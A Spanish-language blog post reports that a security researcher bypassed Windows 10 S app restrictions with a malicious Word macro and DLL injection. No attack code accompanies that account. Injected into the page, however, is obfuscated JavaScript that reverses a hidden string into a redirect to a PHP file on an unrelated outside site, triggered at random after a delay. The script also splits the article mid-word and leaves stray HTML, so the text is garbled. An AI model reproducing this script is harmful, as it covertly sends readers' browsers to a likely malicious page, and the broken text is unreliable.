Windows 10 S “hackeado”. Las macros de Word ponen en evidencia su seguridad
En nuestras pruebas Windows 10 S nos pareció una alternativa poco recomendable sobre todo para los “viejos” usuarios de Windows. Demasiados compromisos y sacrificios para garantizar una seguridad que no es ni mucho menos completa: un reciente descubrimiento desvela cómo las macros de Word pueden poner en jaque a este SO.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>top2/1366_2000.jpg” width=”734″ height=”470″ /></p>
<p>Windows 10 S, “hackeado”</p>
<p>Lo comentaban en ZDNet, donde le pidieron a un exper<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to en seguridad que evaluara Windows 10 S. Matthew Hickley, que trabaja en Hacker House, tardó apenas tres horas en lograr encontrar potenciales vulnerabilidades de seguridad, y acabó afirmando que “sinceramente, estoy sorprendido de que haya sido tan fácil”.
Ssurface
Windows 10 S no solo restringe la instalación de aplicaciones a la tienda de Windows, sino que además deshabilita la ejecución de aplicaciones como la consola de comandos, las herramientas de scripting o el acceso a Powershell (y al subsistema Linux que permite ejecutar bash en Windows, por ejemplo).
Sin embargo, Hickley descubrió que podía crear un documento Word con macros que era malicioso y que le permitiría llevar a cabo un ataque de inyección de DLLs que le permitirían superar las restricciones de la tienda de aplicaciones.
A partir de ahí este experto pudo obtener privilegios de administrador para, por ejemplo, controlar el ordenador de forma remota, y aunque en Microsoft saben bien que garantizar una plataforma como esta al 100% es prácticamente imposible, su teórica apuesta por la seguridad en Windows 10 S se debilita con descubrimientos como este.
Ver información original al respecto en Fuente
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.